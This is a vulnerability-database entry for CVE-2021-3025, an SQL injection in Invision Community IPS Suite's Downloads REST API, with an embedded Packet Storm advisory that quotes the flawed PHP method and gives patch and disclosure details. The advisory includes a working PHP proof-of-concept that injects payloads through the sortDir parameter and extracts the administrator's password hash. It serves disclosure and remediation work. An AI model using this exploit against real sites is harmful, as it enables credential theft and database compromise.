DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2021-3025", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-3025", "description": "Invision Community IPS Community Suite before 4.5.4.2 allows SQL Injection via the Downloads REST API (the sortDir parameter in a sortBy=popular action to the GETindex() method in applications/downloads/api/files.php).", "published": "2021-01-08T07:15:00", "modified": "2021-01-15T17:17:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3025", "reporter": "cve@mitre.org", "references": ["https://invisioncommunity.com/release-notes/", "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html"], "cvelist": ["CVE-2021-3025"], "immutableFields": [], "lastseen": "2022-03-23T17:23:00", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160830"]}], "rev": 4}, "score": {"value": 4.3, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-01-16T00:40:49", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1350693230631936000", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-3025 (ips_community_suite)) has been published on https://t.co/F1Vi6E3Yut?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1350693228136304640", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-3025 (ips_community_suite)) has been published on https://t.co/aI7nyULJke?amp=1"}]}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160830"]}]}, "exploitation": null, "vulnersScore": 4.3}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "invisioncommunity:ips_community_suite", "version": "4.5.4.2", "operator": "lt", "name": "invisioncommunity ips community suite"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:invisioncommunity:ips_community_suite:4.5.4.2:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4.2", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://invisioncommunity.com/release-notes/", "name": "https://invisioncommunity.com/release-notes/", "refsource": "MISC", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "name": "http://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"packetstorm": [{"lastseen": "2021-01-06T16:26:25", "description": "", "published": "2021-01-06T00:00:00", "type": "packetstorm", "title": "IPS Community Suite 4.5.4 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3025"], "modified": "2021-01-06T00:00:00", "id": "PACKETSTORM:160830", "href": "https://packetstormsecurity.com/files/160830/IPS-Community-Suite-4.5.4-SQL-Injection.html", "sourceData": "`----------------------------------------------------------------------------- \nIPS Community Suite <= 4.5.4 (Downloads REST API) SQL Injection Vulnerability \n----------------------------------------------------------------------------- \n \n \n[-] Software Link: \n \nhttps://invisioncommunity.com \n \n \n[-] Affected Versions: \n \nVersion 4.5.4 and prior versions. \n \n \n[-] Vulnerability Description: \n \nThe vulnerability is located within the \n/applications/downloads/api/files.php script, specifically into the \nGETindex() method: \n \n48. public function GETindex() \n49. { \n50. /* Where clause */ \n51. $where = array(); \n52. $sortBy = NULL; \n53. \n54. /* Sort by popular files */ \n55. if( \\IPS\\Request::i()->sortBy == 'popular' ) \n56. { \n57. \\IPS\\Request::i()->sortDir = \\IPS\\Request::i()->sortDir ?: 'ASC'; \n58. $sortBy = 'file_rating ' . \\IPS\\Request::i()->sortDir . ', \nfile_reviews'; \n59. $where = array( array( 'file_rating>?', 0 ) ); \n60. } \n61. \n62. /* Return */ \n63. return $this->_list( $where, 'categories', FALSE, $sortBy ); \n64. } \n \nUser input passed through the \"sortDir\" GET parameter (when \"sortBy\" \nis set to \"popular\") is not properly sanitized before being used to \nconstruct an SQL query at line 58. This can be exploited by remote \nattackers to e.g. read sensitive data from the database through \nerror-based SQL Injection attacks. Successful exploitation of this \nvulnerability requires an API key with permissions to access the \nDownloads Files API. \n \n \n[-] Proof of Concept: \n \nhttp://karmainsecurity.com/pocs/CVE-2021-3025 \n \n--- poc --- \n\"; print \"\\nExample....: php $argv[0] http://localhost/ips/ 6aaf2e085d179866ef40ad0ac9381b36\"; print \"\\nExample....: php $argv[0] https://invisioncommunity.com/ 765ed33ba595c4da8d64c6c22138aa16\\n\\n\"; die(); } list($url, $api_key) = [$argv[1], $argv[2]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, [\"Authorization: Bearer \".base64_encode($api_key)]); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $url = \"{$url}api/index.php?/downloads/files&sortBy=popular&sortDir=%s\"; $sql = \",(select case when (%s) then 1 else 1*(select table_name from information_schema.tables)end)=1#\"; $end = false; $min = true; $idx = 1; while (!$end) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sub_sql = \"select if(ord(substr(members_pass_hash,{$idx},1))<{$test},1,0) from core_members limit 1\"; curl_setopt($ch, CURLOPT_URL, sprintf($url, rawurlencode(sprintf($sql, $sub_sql)))); $min = !preg_match(\"/UNKNOWN_ERROR/\", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) $end = true; $pass .= chr($chr); $min = true; $idx++; print \"\\r[-] Admin's password hash: {$pass}\"; } print \"\\n\"; \n--- poc end --- \n \n \n \n[-] Solution: \n \nApply the vendor patch or upgrade to version 4.5.4.2 or later. \n \n \n[-] Disclosure Timeline: \n \n[19/12/2020] - Vendor notified through HackerOne \n[27/12/2020] - Vendor released a targeted patch \n[05/01/2021] - Vendor released version 4.5.4.2 \n[05/01/2021] - CVE number assigned \n[06/01/2021] - Public disclosure \n \n \n[-] CVE Reference: \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CVE-2021-3025 to this vulnerability. \n \n \n[-] Credits: \n \nVulnerability discovered by Egidio Romano. \n \n \n[-] Original Advisory: \n \nhttp://karmainsecurity.com/KIS-2021-01 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/160830/KIS-2021-01.txt"}]}